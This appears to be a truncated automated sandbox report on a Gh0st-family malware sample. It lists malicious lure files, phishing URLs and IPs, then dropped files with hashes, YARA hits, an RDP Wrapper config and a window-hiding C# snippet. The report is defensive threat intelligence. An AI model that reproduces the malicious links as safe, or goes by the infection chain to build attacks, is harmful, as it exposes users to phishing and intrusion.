	spetsifikatsiya.xls	Get hash	malicious	Browse	37.46.150.139
	spetsifikatsiya.xls	Get hash	malicious	Browse	37.46.150.139
	AdviceSlip.xls	Get hash	malicious	Browse	37.46.150.139
	Export Order Vene.xls	Get hash	malicious	Browse	37.46.150.139
	SimpNet.sh	Get hash	malicious	Browse	37.46.150.238
	Rr0veY2Ho5.exe	Get hash	malicious	Browse	37.46.150.211
	product_qoute_6847684898.xls	Get hash	malicious	Browse	37.46.150.211
	EjtRDKZNkXWoLTE.exe	Get hash	malicious	Browse	37.46.150.60
	ru7co.xls	Get hash	malicious	Browse	37.46.150.60
	http://37.46.150.184/high/iman	Get hash	malicious	Browse	37.46.150.184
	SWIFT-MTC749892-10-12-20_pdf.exe	Get hash	malicious	Browse	37.46.150.41
	SWIFT COPY.xls	Get hash	malicious	Browse	37.46.150.41
UNIFIEDLAYER-AS-1US	ul9kpUwYel.xls	Get hash	malicious	Browse	192.185.194.191
	______.doc	Get hash	malicious	Browse	192.185.151.24
	______.doc	Get hash	malicious	Browse	192.185.151.24
	http://0620218.unfreezegrowers.com/bGVhaC5oZWl0bmVyQGV4cC5jb20=	Get hash	malicious	Browse	162.241.175.181
	http://landerer.wellwayssaustralia.com/r/?id=kl522318,Z185223,I521823&rd=www.electriccollisionrepair.com/236:52%20PMt75252n2021?e=#landerer@doriltoncapital.com	Get hash	malicious	Browse	50.87.150.0
	https://1drv.ms/u/s!AmqlOnt-7_dxdENKsoSwOCjxG_Q?e=3ZrXeG	Get hash	malicious	Browse	162.241.127.190
	https://cypressbayhockey.com/NO	Get hash	malicious	Browse	192.185.120.89
	https://pdfsharedmessage.xtensio.com/7wtcdlta	Get hash	malicious	Browse	108.179.246.23
	form.doc	Get hash	malicious	Browse	162.241.148.243
	RFQPO90865802ICONME.exe	Get hash	malicious	Browse	192.185.131.105
	Ekz Payment.htm	Get hash	malicious	Browse	192.185.196.146
	http://moneypay.best/	Get hash	malicious	Browse	192.232.250.4
	https://canningelectricinc.wordpress.com/	Get hash	malicious	Browse	192.185.188.96
	Lmcgrath - FAX_ALNRSUW.html	Get hash	malicious	Browse	192.185.29.156
	Inquiry-RFQ93847849-pdf.exe	Get hash	malicious	Browse	108.167.141.199
	W08347.exe	Get hash	malicious	Browse	192.185.117.218
	https://datetheright1.com/damn/sharepoint%20new	Get hash	malicious	Browse	162.144.40.98
	http://covisa.com.br/paypal-closed-y2hir/ABqY1RAPjaNGnFw9flbsTw3mbHnBB1OUWRV6kbbvfAryr4bmEsDoeNMECXf3fg6io/	Get hash	malicious	Browse	162.241.101.253
	8G9b9FXspm.exe	Get hash	malicious	Browse	162.241.219.113
	Nuevo pedido.exe	Get hash	malicious	Browse	192.185.131.105

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files\Microsoft DN1\sqlmap.dll	Order Inquiry.exe	Get hash	malicious	Browse
	New Order.exe	Get hash	malicious	Browse
	PR E-2012513 SMT PART SUPPLY.xlsx.exe	Get hash	malicious	Browse
	xVngcLqeWG.exe	Get hash	malicious	Browse
	9By1j8TSMG.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.DownLoader36.28619.2173.exe	Get hash	malicious	Browse
	Parcel_Slip_&_Address_Form.xls	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PWS.Maria.4.28965.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Troj.XMLDwn-AS.10120.rtf	Get hash	malicious	Browse
	newbinx.exe	Get hash	malicious	Browse
	my_client_specification.exe	Get hash	malicious	Browse
	Listings of Items pdf Specifications pdf.exe	Get hash	malicious	Browse
	Purchasing Order.exe	Get hash	malicious	Browse
	Order #DCF 465789.exe	Get hash	malicious	Browse
	uPg8j4T6A9.exe	Get hash	malicious	Browse
	New order samples #8495.exe	Get hash	malicious	Browse
	xE08uG0aqO.exe	Get hash	malicious	Browse
	OfRRJlmMtZ.exe	Get hash	malicious	Browse
	PO-HH00890.exe	Get hash	malicious	Browse
	Po Shkm120022019 order confirmation.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files\Microsoft DN1\rdpwrap.ini Download File
Process:	C:\Users\user\AppData\Local\Temp\Test3.jpg
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	181846
Entropy (8bit):	5.421809355655133
Encrypted:	false
SSDEEP:	768:WEUfQYczxEQBLWf9PUupBdfbQnxJcRZsMFdKlax8Rr/d6gl/+f8jZ0fyL+8F7f6/:57f6GqZm0c11IvimstYUWtN/7
MD5:	6BC395161B04AA555D5A4E8EB8320020
SHA1:	F18544FAA4BD067F6773A373D580E111B0C8C300
SHA-256:	23390DFCDA60F292BA1E52ABB5BA2F829335351F4F9B1D33A9A6AD7A9BF5E2BE
SHA-512:	679AC80C26422667CA5F2A6D9F0E022EF76BC9B09F97AD390B81F2E286446F0658524CCC8346A6E79D10E42131BC428F7C0CE4541D44D83AF8134C499436DAAE
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge....[Main]..Updated=2020-08-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[PatchCodes]..nop=90..Zero=00..jmpshort=EB..nopjmp=90E9..CDefPolicy_Query_edx_ecx=BA000100008991200300005E90..CDefPolicy_Query_eax_rcx_jmp=B80001000089813806000090EB..CDefPolicy_Query_eax_esi=B80001000089862003000090..CDefPolicy_Query_eax_rdi=B80001000089873806000090..CDefPolicy_Query_eax_ecx=B80001000089812003000090..CDefPolicy_Query_eax_ecx_jmp=B800010000898120030000EB0E..CDefPolicy_Query_eax_rcx=B80001000089813806000090..CDefPolicy_Query_edi_rcx=BF0001000089B938060000909090....[SLInit]..bServerSku=1..bRemoteConnAllowed=1..bFUSEnabled=1..bAppServerAllowed=1..bMultimonAllowed=1..lMaxUserSessions=0..ulMaxDebugSessions=0..bInitialized=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionM

C:\Program Files\Microsoft DN1\sqlmap.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\Test3.jpg
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	116736
Entropy (8bit):	5.884975745255681
Encrypted:	false
SSDEEP:	3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
MD5:	461ADE40B800AE80A40985594E1AC236
SHA1:	B3892EEF846C044A2B0785D54A432B3E93A968C8
SHA-256:	798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
SHA-512:	421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 22%, Browse Antivirus: ReversingLabs, Detection: 41%
Joe Sandbox View:	Filename: Order Inquiry.exe, Detection: malicious, Browse Filename: New Order.exe, Detection: malicious, Browse Filename: PR E-2012513 SMT PART SUPPLY.xlsx.exe, Detection: malicious, Browse Filename: xVngcLqeWG.exe, Detection: malicious, Browse Filename: 9By1j8TSMG.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.DownLoader36.28619.2173.exe, Detection: malicious, Browse Filename: Parcel_Slip_&_Address_Form.xls, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.PWS.Maria.4.28965.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Troj.XMLDwn-AS.10120.rtf, Detection: malicious, Browse Filename: newbinx.exe, Detection: malicious, Browse Filename: my_client_specification.exe, Detection: malicious, Browse Filename: Listings of Items pdf Specifications pdf.exe, Detection: malicious, Browse Filename: Purchasing Order.exe, Detection: malicious, Browse Filename: Order #DCF 465789.exe, Detection: malicious, Browse Filename: uPg8j4T6A9.exe, Detection: malicious, Browse Filename: New order samples #8495.exe, Detection: malicious, Browse Filename: xE08uG0aqO.exe, Detection: malicious, Browse Filename: OfRRJlmMtZ.exe, Detection: malicious, Browse Filename: PO-HH00890.exe, Detection: malicious, Browse Filename: Po Shkm120022019 order confirmation.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1C667E71-DE7F-40D0-8C7D-A76533AF53EA Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	132942
Entropy (8bit):	5.372926648458861
Encrypted:	false
SSDEEP:	1536:3cQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:LrQ9DQW+zBX8P
MD5:	4FB01D7787238629B8BF2AA75C08D807
SHA1:	DEAE2DBA4C6F585F32C0E6CD15BD11A31274FEBE
SHA-256:	AB8E2FD0CBF3A2812608DFC51931E9F6C1E077E4DE95C436EDEA3DBA6864D591
SHA-512:	DE25EE4713B5A504958F506E8E4A462C3473FD043ABCA86673BD3492559EFE7CFF09A3D1187D76B754D20EB20EBAD95E76EB2DC67A2333E8427922AF02ACE8DC
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-08T08:34:22">.. Build: 16.0.13706.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	33555
Entropy (8bit):	5.023679594333714
Encrypted:	false
SSDEEP:	768:O8V3IpNBQkj2Yh4iUxZvlard3TFn6/zFtFgVx1UtRj7vioBnPVe7oZnlkOdBWtA1:O8V3CNBQkj2Yh4iUx3qdD56/zFzgVx1m
MD5:	2C3F440BB2D620A7675D27766C2ABD6A
SHA1:	27F427EF4C5D526444D4523DBCFE6709573B8333
SHA-256:	604F8DA3B31E7C8D88190AEDBA23C9106A8140E1AB74453640111643058B7BA2
SHA-512:	76C485F298B00A47FABBF1E9A8424A21806EADFC46C9FA347E18BD37D8F55B07C4FF8517217FAF0BB2C5353636D5D91F05348BDCD604B7D6511845E20444AD70
Malicious:	false
Preview:	PSMODULECACHE.#...........q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem...............?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........+......C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	21540
Entropy (8bit):	5.462653171685211
Encrypted:	false
SSDEEP:	384:DtL6Et8lxH09tpSYsJu0iQeZUn1u16zqymHKHVQ39ZjaIvUI++j/:r8zHY3psJu/pC3qj+GH2ly
MD5:	294D364B13240176AB7602CE356D363A
SHA1:	44465063D48270132CFC557DEDFCC253B5932DEB
SHA-256:	5FCDC94212A1D4190D40652D17EB163C15D71FC72E1D7206E731172BFA6F26DB
SHA-512:	8EE5DF0B3DEA5726070DFC87B114A2CE177642800F6DECB603E678F943D65899AEEAD1051F801C54DE12C6362CBDDC858D78CF6EB860AC6EBD0AA30AE5989891
Malicious:	false
Preview:	@...e...................................k............@..........H...............<@.^.L."My...:<..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)Q.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F...]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD...............Microsoft.Management.Inf

C:\Users\user\AppData\Local\Temp\CBC40000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	115078
Entropy (8bit):	7.925311650638153
Encrypted:	false
SSDEEP:	3072:xpHzSJtwYold/FMeHxvPnelLDCfXoCFZhA:bIwYoLH9PnedDCfLHhA
MD5:	75B07DAB591787C95F778CDE2F9310FF
SHA1:	A0C649009C4CC295CDB70F260993165700088BCB
SHA-256:	80D29F8A4C1ECA0CC3095BABB0AE72A38161F870C057CDE94DBA007F0B305067
SHA-512:	9E75EDA7641E5FA0550E4483C986C97DF442BE343C80E3A919A07996114B6C2A983FEF341D824467F39216DD0169472B576D8E7B8014894908D28B1DB1DB6F06
Malicious:	false
Preview:	.U.N.1..#...\.L.H..N9......4q..l......."P.F .........?.YS.@D.]......I.......>e.&.0.A...\|...........l.R8........p...hE..8.A...?..N....Ku..l...x6......v..X..T-.!.-E".../$.......%..C..p...iB....!%*.._...`..T.,....D0.M...2K18......rd...[ja...;..........t.......X.L.i.g..2.+'..(&.{W..../......G...\PW..q.FY.w.q.j.B..?.Ht....w...........]..`VQ..!..?.w......]..itF.^.....u .I.j.;.+F..?...`W..p..#.........PK..........!.;.!............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................MO.0...H

C:\Users\user\AppData\Local\Temp\RES578D.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2188
Entropy (8bit):	2.7040707917513203
Encrypted:	false
SSDEEP:	24:p+fqsluDfHqWhKENpXffI+ycuZhNUakSgPNnq92pEYzW9I:cqsqKMK4lH1ulUa34q9NO
MD5:	4AA337D311AEC2F568C910ABE633449D
SHA1:	26A8756F1F2E1F81F29E74489E2E8B27438751ED
SHA-256:	D16FD2EB016F7E981CFC46CF56C4BCB4EC2612DA3083ADAED26F02401D33DB32
SHA-512:	511D405DCAFDB5334C96EA7BB63FFCB85F7FCF23CAAA00E555CCC19047D1930B8DE832C952C2A546F40D897EB57DFB0CF61844A111883F9EABE5A30D73D12E9C
Malicious:	false
Preview:	........T....c:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP................o.o.m..<....Mk...........4.......C:\Users\user\AppData\Local\Temp\RES578D.tmp.-.<...................'...Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Documents.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Test1.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	286720
Entropy (8bit):	7.322095096487576
Encrypted:	false
SSDEEP:	6144:68Fqx8a90KqAVpYok5NUE9N4V5PtFLAM1BoBes+i:68ox8a9XqSYVr9N4V5nL1iBes
MD5:	1199FCAA4DC6DF0A9FD128045DC57755
SHA1:	1F0C0A3A0EFE1204D21ACF9855ABE48CAB6375C1
SHA-256:	70278D9FB1DFFEB87D9D2866DC6E5769BE83DC2AF06C5E5B4B1271BBBE231925
SHA-512:	5F6DF352FF087B8F15A9B27DFD10078A74AC247120C1EB2209211FF89AAD0B296C61C6DC8FB896E879D8C71B38F97C3FC42231C479483D2310533D2E1076C2AE
Malicious:	true
Yara Hits:	Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test1.txt, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test1.txt, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...E%..r...<!..v...s...q...Richs...........................PE..L......_.....................`....................@..........................p..............................................L...P....0..h,...................`..........................................................t............................text............................... ..`.rdata..............................@..@.data...H...........................@....rsrc...h,...0...0... ..............@..@.reloc.......`.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Test2.gif Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 843 x 685, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	52573
Entropy (8bit):	7.929770193106239
Encrypted:	false
SSDEEP:	1536:q8as4TUSrbfoAKgxCllllllhy8PZMPAW07jI:ETUkJkllllllhyKnI
MD5:	BD077FF603FB6873277C658C2FA9F84B
SHA1:	2F70973669FEABE962DA03DD4F4A25CE789EF7A1
SHA-256:	12CE388F55373DBAA49259D196B2B692EF70A2CD1999406BB46D562AA9C56168
SHA-512:	205C3E7CB055179F24CBA13BC381A358648221A37F1F05EFFBDE91814794941FFDCFB3D41567B3E86970683180570D4CE18CE4A49EA729202A989200A91737B7
Malicious:	false
Preview:	.PNG........IHDR...K.........yLb.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..ix.....\|I...^.{.3.af.xMH2q..$L2..'q...c[.1.........1..........hA.I......b..OuUWWWW..st$.Z./..T?U.Tuw...-.]..R..... .. ..RM.px.........@Jk6.>.9<:.....N.j. .. ..z.....&O8<.;.. .....rt......l.!.. ....(..Z...... .. (....;.A..A...t.9....g.....f,..c.o~t.C..8x......9..;........../....A..A.U....?uFj..&W.o>\|..'_~.%...?.${.8.~....eD...)........mYY..ef.e.n. e4i....m...[.n.s.=...>zBk.m.8q.. .. .IS....D.Z{.w.&.P..QE....N.YY.B...+W>.8y.c..G;....t..q_.FR..........u...SO=.~...H..++...b].._.H..,......OM...+....S.z]M}.CG.k.:..u..k..W..../)_S.Fk..p...A..ARd.._..'...s....{..;5.4.px/.-.\|......O\|.....u4..k.......c}...t4.e/...G..=..[.=wAF.....~.O..]{{.....}....^a~...TXWYUTPT..j.....s....#.W..Zm..v..S.~...G.!.w..........4..8.)....<Q.w.&......O.......)[.-.(u....[..^......B5.8...a/....>....G.Z<..'#.K..............D"g...CP.Juf^..."..S.T.468<..........ON^..J..

C:\Users\user\AppData\Local\Temp\Test3.jpg Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	339293
Entropy (8bit):	7.452811147071355
Encrypted:	false
SSDEEP:	6144:68Fqx8a90KqAVpYok5NUE9N4V5PtFLAM1BoBes+ihJllllllhyKnI:68ox8a9XqSYVr9N4V5nL1iBesLJllllm
MD5:	DD27F33FCD6F1FA4C67EE05D836795C2
SHA1:	892A94B23AB7F4250AE62405C6E6747056173B35
SHA-256:	504E0489472D6107D56D6D4F88600200B055BD97C3158EF1C9A54EA38074351A
SHA-512:	78B9867A74E3564B3BA4C18F9FA625E6D6B40066F575844BC59A766DA131CAC9C945A59F197B5738E90A8472000DA7A8CB38A27D57AC46E643C75D9BA3E66D05
Malicious:	true
Yara Hits:	Rule: Codoso_Gh0st_2, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...E%..r...<!..v...s...q...Richs...........................PE..L......_.....................`....................@..........................p..............................................L...P....0..h,...................`..........................................................t............................text............................... ..`.rdata..............................@..@.data...H...........................@....rsrc...h,...0...0... ..............@..@.reloc.......`.......P..............@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wkcwt4o.03d.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3kf5esz.2v3.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uogviepe.ktp.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uw12ulry.jxg.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\mvqape5o\CSCDBDF9420C89B4C89B070DDF57D28F899.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.101805487886205
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBQak7YnqqqVPN5Dlq5J:+RI+ycuZhNUakSgPNnqX
MD5:	E96FCC6FFB6D0CDA3C1E8B14E04D6BB1
SHA1:	F8BF48E30342EF5181A2BC62271EA473C332B171
SHA-256:	F06C1253D2BFA5723642491DC1B9CD2B30828086D99D9FF66AA87BC43E6CED35
SHA-512:	513D7B7589D08D075D925FD7F5160C5295ADBA7CE30FE01A3CD6CD9E60AEC0614639A6357EF070EE0934DECB7910141D5E3D4E676381E087681FCE8E5AEB3803
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.v.q.a.p.e.5.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.v.q.a.p.e.5.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.0.cs Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	227
Entropy (8bit):	4.717813898714253
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zumJFR66rl0F0SRkoSdt+imlwy:V/DTLDfuCRlrmF/9Amlwy
MD5:	C8539D40B0344511F4CB0BC03C897CA5
SHA1:	0CDEC0D89F33ED83A76B545EE94A1E0471C1A955
SHA-256:	F852CD7B0364BD9D393F8F96008E3BE0E1EC86373D3E8EE83C32D4B69DB87750
SHA-512:	A338C34406FBDEB8701E75AC6DBD1DEB5F268C144B4D33EFD0FC2AB56F90DE81BFAB3AD31B42E164B63EF205DF76109F0D79EB35C5540C5E95ADA1B9B742079D
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace nAtIvE.{. public class Win. {. [ DllImport ( ("user32" + "." + "dll" ) ) ] public static extern bool ShowWindow(int handle , int state) ; .. }..}.

C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.cmdline Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.21517798379197
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fDD0zxs7+AEszIwkn23fDN:p37Lvkmb6KRff0WZEifZ
MD5:	84A2B4EA4EAC4B80CD95A6FB6B93B142
SHA1:	1DB1F3671ECC2455775CB2C30303030B2D9083B1
SHA-256:	03EA981AD664412B3087B1B6411FCC1875A732DA901D5B6E4D9B2FF845066193
SHA-512:	B45A52DC74ACA1F2AD61DF202F4CEA25CD457CE88F264A662B61F8B34B24B193F72602D1128EB73E861142ABA2B6F4780158B2837316688E4EC77BED1969800A
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.0.cs"

C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
